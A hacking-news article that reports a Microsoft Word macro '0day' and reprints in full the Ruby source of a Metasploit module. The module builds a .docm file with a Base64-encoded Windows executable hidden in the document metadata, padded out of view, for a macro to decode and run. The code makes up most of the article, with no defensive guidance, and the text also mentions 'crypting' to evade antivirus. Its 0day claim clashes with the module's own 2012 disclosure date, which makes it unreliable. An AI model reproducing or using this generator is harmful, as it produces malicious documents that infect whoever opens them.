• Home
  • About Us
  • Authors
  • Submit News
  • Contact Us
  • Privacy Policy
  • Sitemap
The Hack Post
  • Hacking News
    • Cyber Crime
  • Cyber Security
  • Technology
    • Internet
  • Entertainment
    • Gaming
  • Business
  • Science / Health
No Result
View All Result
The Hack Post
No Result
View All Result

Microsoft Word Macro Execution 0day Exploit Found

Alizaib Hassan by Alizaib Hassan
February 9, 2017
Microsoft Word Macro Execution 0day Exploit Found
Share on FacebookShare on Twitter

An exploit in Microsoft Office Word has been discovered allowing hackers to execute malicious macro-based codes. Attackers can run the exploit in Metasploit and embed a macro virus into a Microsoft Word document.

According to WikiPedia:

A macro virus is a virus that is written in a macro language: a programming language which is embedded inside a software application (e.g., word processors and spreadsheet applications). Some applications, such as Microsoft Office, Excel, Power point allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. This is one reason it can be dangerous to open unexpected attachments in e-mails. Many antivirus programs can detect macro viruses, however they are still difficult to detect and its spread from the network.

A hacker injecting this exploit into a network of computers can be destructive. A virus such as this can spread like bacteria in a petri-dish. Especially in this day and age where files are always transferred from one computer to another, not just in schools but also at work places and of course amongst friends and families. The virus can spread to millions of computers within just a few months, weeks, days or even hours.

The exploit was uploaded to an exploit database by an internet user going by the alias of sinn3r, with the whole code being available for anyone to use. It is unsure whether sinn3r is the original author of the exploit as of yet.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'

class MetasploitModule "Microsoft Office Word Malicious Macro Execution",
'Description' => %q{
This module generates a macro-enabled Microsoft Office Word document. The comments
metadata in the data is injected with a Base64 encoded payload, which will be
decoded by the macro and execute as a Windows executable.

For a successful attack, the victim is required to manually enable macro execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r' # Metasploit
],
'References' =>
[
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => true
},
'Platform' => 'win',
'Targets' =>
[
['Microsoft Office Word', {}],
],
'Privileged' => false,
'DisclosureDate' => "Jan 10 2012",
'DefaultTarget' => 0
))

register_options([
OptString.new("BODY", [false, 'The message for the document body', '']),
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
], self.class)
end

def on_file_read(short_fname, full_fname)
buf = File.read(full_fname)

case short_fname
when /document\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /core\.xml/
b64_payload = ' ' * 55
b64_payload << Rex::Text.encode_base64(generate_payload_exe)
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
end

# The original filename of __rels is actually ".rels".
# But for some reason if that's our original filename, it won't be included
# in the archive. So this hacks around that.
case short_fname
when /__rels/
short_fname.gsub!(/\_\_rels/, '.rels')
end

yield short_fname, buf
end

def package_docm(path)
zip = Rex::Zip::Archive.new

Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')

if File.directory?(file)
print_status("Packaging directory: #{file}")
zip.add_file(p)
else
on_file_read(p, file) do |fname, buf|
print_status("Packaging file: #{fname}")
zip.add_file(fname, buf)
end
end
end

zip.pack
end

def exploit
print_status('Generating our docm file...')
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
docm = package_docm(path)
file_create(docm)
super
end
end

Viruses embedded into other forms and formats of files can also be easily go unnoticed by anti-viruses. Silent viruses and macro viruses such as this one can easily be made undetectable by a method called crypting. Methods such as these have existed since the very first virus was ever created. With time, hackers have gotten smarter and so have their destructive viruses and methods of undetectability.

Tags: Microsoft Word Exploit
Alizaib Hassan

Alizaib Hassan

Writer and content creator at The Hack Post. My adamant love for blogging, web development and programming has made me realise that contributing what I know is not only educative but also fun. Discussing topics with others is what drove me to become an author and I love every single moment of it. Founder of www.azhblog.com

Next Post
Australian, New South Wales Government County Council Hacked by NeT.Defacer

Australian, New South Wales Government County Council Hacked by NeT.Defacer

Latest Articles

The Premier Choice for Cesspool Service near Ronkonkoma, NY
Business

The Premier Choice for Cesspool Service near Ronkonkoma, NY

May 26, 2023
A-1 Sewer & Drain
Business

A-1 Sewer and Drain

May 26, 2023
What is Content at Scale and How Does it Help Boost Your Content?
news

What is Content at Scale and How Does it Help Boost Your Content?

May 26, 2023
The Evolution of Payment Systems in the Cryptocurrency Landscape
Business

The Evolution of Payment Systems in the Cryptocurrency Landscape

May 25, 2023
Reasons Small Business Loans get rejected
news

Reasons Small Business Loans get Rejected

May 16, 2023
A Complete Guide on Mobile App Wrapping
Technology

A Complete Guide on Mobile App Wrapping

May 16, 2023
Best Roofing Company in Indianapolis
news

Best Roofing Company in Indianapolis

May 16, 2023
Sealants for Industrial Processes Introducing CJM Centritec Non Contact Seals and CinchSeal Rotary Shaft Seals
news

Sealants for Industrial Processes: Introducing CJM Centritec Non Contact Seals and CinchSeal Rotary Shaft Seals

May 15, 2023
Building Custom Generative AI Models with TensorFlow
Technology

Building Custom Generative AI Models with TensorFlow

May 13, 2023
Secure Your Gaming Experience Top Tips for Safer Online Play
Entertainment

Secure Your Gaming Experience: Top Tips for Safer Online Play

May 11, 2023
windows in europe Everything You Need to Know
news

Windows in Europe: Everything You Need to Know

May 4, 2023
4 Advantages You Can Get Using WordPress Alternatives
Technology

4 Advantages You Can Get Using WordPress Alternatives

April 29, 2023
  • Home
  • About Us
  • Authors
  • Submit News
  • Contact Us
  • Privacy Policy
  • Sitemap

The Hack Post © 2019

No Result
View All Result
  • Hacking News
    • Cyber Crime
  • Cyber Security
  • Technology
    • Internet
  • Entertainment
    • Gaming
  • Business
  • Science / Health

The Hack Post © 2019